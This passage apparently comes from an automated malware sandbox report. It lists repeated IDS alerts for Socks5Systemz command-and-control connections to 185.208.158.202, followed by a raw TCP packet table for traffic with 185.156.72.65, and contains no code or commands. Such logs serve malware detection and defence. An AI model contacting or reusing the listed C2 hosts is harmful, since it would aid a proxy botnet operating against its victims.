                                                                2024-11-20T05:03:26.013459+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449904185.208.158.20280TCP
                                                                2024-11-20T05:03:26.986222+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449910185.208.158.20280TCP
                                                                2024-11-20T05:03:26.986222+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449910185.208.158.20280TCP
                                                                2024-11-20T05:03:27.814581+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449917185.208.158.20280TCP
                                                                2024-11-20T05:03:27.814581+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449917185.208.158.20280TCP
                                                                2024-11-20T05:03:28.175922+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449917185.208.158.20280TCP
                                                                2024-11-20T05:03:28.175922+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449917185.208.158.20280TCP
                                                                2024-11-20T05:03:29.003148+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449927185.208.158.20280TCP
                                                                2024-11-20T05:03:29.003148+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449927185.208.158.20280TCP
                                                                2024-11-20T05:03:29.864671+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449933185.208.158.20280TCP
                                                                2024-11-20T05:03:29.864671+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449933185.208.158.20280TCP
                                                                2024-11-20T05:03:30.897323+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449939185.208.158.20280TCP
                                                                2024-11-20T05:03:30.897323+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449939185.208.158.20280TCP
                                                                2024-11-20T05:03:31.290583+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449939185.208.158.20280TCP
                                                                2024-11-20T05:03:31.290583+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449939185.208.158.20280TCP
                                                                2024-11-20T05:03:32.129208+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449945185.208.158.20280TCP
                                                                2024-11-20T05:03:32.129208+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449945185.208.158.20280TCP
                                                                2024-11-20T05:03:32.485151+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449945185.208.158.20280TCP
                                                                2024-11-20T05:03:32.485151+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449945185.208.158.20280TCP
                                                                2024-11-20T05:03:33.323396+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449956185.208.158.20280TCP
                                                                2024-11-20T05:03:33.323396+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449956185.208.158.20280TCP
                                                                2024-11-20T05:03:34.155422+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449962185.208.158.20280TCP
                                                                2024-11-20T05:03:34.155422+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449962185.208.158.20280TCP
                                                                2024-11-20T05:03:35.150207+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449968185.208.158.20280TCP
                                                                2024-11-20T05:03:35.150207+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449968185.208.158.20280TCP
                                                                2024-11-20T05:03:36.033281+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449974185.208.158.20280TCP
                                                                2024-11-20T05:03:36.033281+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449974185.208.158.20280TCP
                                                                2024-11-20T05:03:36.989737+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:36.989737+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:37.360947+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:37.360947+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:37.716797+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:37.716797+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449980185.208.158.20280TCP
                                                                2024-11-20T05:03:38.564118+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449991185.208.158.20280TCP
                                                                2024-11-20T05:03:38.564118+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449991185.208.158.20280TCP
                                                                2024-11-20T05:03:38.925442+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449991185.208.158.20280TCP
                                                                2024-11-20T05:03:38.925442+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449991185.208.158.20280TCP
                                                                2024-11-20T05:03:39.993516+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449999185.208.158.20280TCP
                                                                2024-11-20T05:03:39.993516+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449999185.208.158.20280TCP
                                                                2024-11-20T05:03:40.837006+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450004185.208.158.20280TCP
                                                                2024-11-20T05:03:40.837006+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450004185.208.158.20280TCP
                                                                2024-11-20T05:03:41.685590+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450011185.208.158.20280TCP
                                                                2024-11-20T05:03:41.685590+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450011185.208.158.20280TCP
                                                                2024-11-20T05:03:42.515663+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450017185.208.158.20280TCP
                                                                2024-11-20T05:03:42.515663+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450017185.208.158.20280TCP
                                                                2024-11-20T05:03:43.344138+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450023185.208.158.20280TCP
                                                                2024-11-20T05:03:43.344138+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450023185.208.158.20280TCP
                                                                2024-11-20T05:03:44.181802+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450028185.208.158.20280TCP
                                                                2024-11-20T05:03:44.181802+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450028185.208.158.20280TCP
                                                                2024-11-20T05:03:45.014578+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450029185.208.158.20280TCP
                                                                2024-11-20T05:03:45.014578+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450029185.208.158.20280TCP
                                                                2024-11-20T05:03:45.841220+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450030185.208.158.20280TCP
                                                                2024-11-20T05:03:45.841220+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450030185.208.158.20280TCP
                                                                2024-11-20T05:03:46.665553+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450031185.208.158.20280TCP
                                                                2024-11-20T05:03:46.665553+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450031185.208.158.20280TCP
                                                                2024-11-20T05:03:47.498201+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450032185.208.158.20280TCP
                                                                2024-11-20T05:03:47.498201+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450032185.208.158.20280TCP
                                                                2024-11-20T05:03:48.354773+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450033185.208.158.20280TCP
                                                                2024-11-20T05:03:48.354773+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450033185.208.158.20280TCP
                                                                2024-11-20T05:03:49.183437+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450034185.208.158.20280TCP
                                                                2024-11-20T05:03:49.183437+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450034185.208.158.20280TCP
                                                                2024-11-20T05:03:50.006850+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450035185.208.158.20280TCP
                                                                2024-11-20T05:03:50.006850+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450035185.208.158.20280TCP
                                                                2024-11-20T05:03:50.849542+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450036185.208.158.20280TCP
                                                                2024-11-20T05:03:50.849542+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450036185.208.158.20280TCP
                                                                2024-11-20T05:03:51.338903+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450036185.208.158.20280TCP
                                                                2024-11-20T05:03:51.338903+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450036185.208.158.20280TCP
                                                                2024-11-20T05:03:52.189569+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:52.189569+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:52.550809+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:52.550809+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:52.911402+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:52.911402+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:53.274782+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:53.274782+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450037185.208.158.20280TCP
                                                                2024-11-20T05:03:54.114938+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:54.114938+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:54.469937+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:54.469937+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:54.962762+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:54.962762+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450038185.208.158.20280TCP
                                                                2024-11-20T05:03:55.796532+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450039185.208.158.20280TCP
                                                                2024-11-20T05:03:55.796532+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450039185.208.158.20280TCP
                                                                2024-11-20T05:03:56.638762+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450040185.208.158.20280TCP
                                                                2024-11-20T05:03:56.638762+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450040185.208.158.20280TCP
                                                                2024-11-20T05:03:57.469980+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450041185.208.158.20280TCP
                                                                2024-11-20T05:03:57.469980+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450041185.208.158.20280TCP
                                                                2024-11-20T05:03:58.720031+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450042185.208.158.20280TCP
                                                                2024-11-20T05:03:58.720031+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450042185.208.158.20280TCP
                                                                2024-11-20T05:03:59.578052+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450043185.208.158.20280TCP
                                                                2024-11-20T05:03:59.578052+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450043185.208.158.20280TCP
                                                                2024-11-20T05:04:00.430705+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450044185.208.158.20280TCP
                                                                2024-11-20T05:04:00.430705+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450044185.208.158.20280TCP
                                                                2024-11-20T05:04:01.290859+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450045185.208.158.20280TCP
                                                                2024-11-20T05:04:01.290859+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450045185.208.158.20280TCP
                                                                2024-11-20T05:04:02.423851+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450046185.208.158.20280TCP
                                                                2024-11-20T05:04:02.423851+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450046185.208.158.20280TCP
                                                                2024-11-20T05:04:02.792646+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450046185.208.158.20280TCP
                                                                2024-11-20T05:04:02.792646+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450046185.208.158.20280TCP
                                                                2024-11-20T05:04:03.640276+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450047185.208.158.20280TCP
                                                                2024-11-20T05:04:03.640276+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450047185.208.158.20280TCP
                                                                2024-11-20T05:04:04.467375+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450048185.208.158.20280TCP
                                                                2024-11-20T05:04:04.467375+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450048185.208.158.20280TCP
                                                                2024-11-20T05:04:05.296380+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450049185.208.158.20280TCP
                                                                2024-11-20T05:04:05.296380+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450049185.208.158.20280TCP
                                                                2024-11-20T05:04:06.232401+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450050185.208.158.20280TCP
                                                                2024-11-20T05:04:06.232401+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450050185.208.158.20280TCP
                                                                2024-11-20T05:04:07.075224+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450051185.208.158.20280TCP
                                                                2024-11-20T05:04:07.075224+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450051185.208.158.20280TCP
                                                                2024-11-20T05:04:07.930877+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450052185.208.158.20280TCP
                                                                2024-11-20T05:04:07.930877+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450052185.208.158.20280TCP
                                                                2024-11-20T05:04:08.770839+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450053185.208.158.20280TCP
                                                                2024-11-20T05:04:08.770839+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450053185.208.158.20280TCP
                                                                2024-11-20T05:04:09.241906+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450053185.208.158.20280TCP
                                                                2024-11-20T05:04:09.241906+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450053185.208.158.20280TCP
                                                                2024-11-20T05:04:10.097218+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450054185.208.158.20280TCP
                                                                2024-11-20T05:04:10.097218+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450054185.208.158.20280TCP
                                                                2024-11-20T05:04:10.465007+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450054185.208.158.20280TCP
                                                                2024-11-20T05:04:10.465007+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450054185.208.158.20280TCP
                                                                2024-11-20T05:04:11.292434+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450055185.208.158.20280TCP
                                                                2024-11-20T05:04:11.292434+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450055185.208.158.20280TCP
                                                                2024-11-20T05:04:13.148623+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450056185.208.158.20280TCP
                                                                2024-11-20T05:04:13.148623+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450056185.208.158.20280TCP
                                                                2024-11-20T05:04:13.978186+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450057185.208.158.20280TCP
                                                                2024-11-20T05:04:13.978186+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450057185.208.158.20280TCP
                                                                2024-11-20T05:04:14.830874+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:14.830874+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:15.203927+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:15.203927+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450058185.208.158.20280TCP
                                                                2024-11-20T05:04:16.029802+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450059185.208.158.20280TCP
                                                                2024-11-20T05:04:16.029802+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450059185.208.158.20280TCP
                                                                2024-11-20T05:04:16.852260+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450060185.208.158.20280TCP
                                                                2024-11-20T05:04:16.852260+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450060185.208.158.20280TCP
                                                                2024-11-20T05:04:17.704692+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450061185.208.158.20280TCP
                                                                2024-11-20T05:04:17.704692+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450061185.208.158.20280TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 20, 2024 05:02:15.227372885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:15.232379913 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:15.232459068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:15.232590914 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:15.237464905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:16.048826933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:16.048918962 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:16.306072950 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:16.311104059 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.378030062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.378061056 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.378088951 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.378115892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.378115892 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.378202915 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.387880087 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.392674923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857040882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857166052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857199907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857254028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857276917 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857311010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857333899 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857368946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857402086 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857419014 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857450008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857486010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857506990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857532978 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857909918 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857944965 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.857971907 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.857990026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.858196020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.858231068 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.858251095 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.858279943 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.862376928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.862457037 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.969873905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.969945908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.969984055 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970072031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970105886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970129013 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970155954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970191002 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970211983 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970240116 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970263958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970319033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970839977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970873117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970906019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970927000 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.970952988 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.970995903 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971009970 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971039057 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971467018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971501112 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971523046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971555948 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971576929 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971602917 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971628904 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971672058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.971685886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.971714973 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972217083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972250938 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972273111 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972291946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972323895 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972373009 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972630978 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972681999 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972702980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972745895 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972759962 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972790003 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972812891 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972846031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.972867012 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.972889900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.973489046 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.973543882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.975188017 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.975218058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:17.975245953 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:17.975275040 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:18.083069086 CET8049730185.156.72.65192.168.2.4
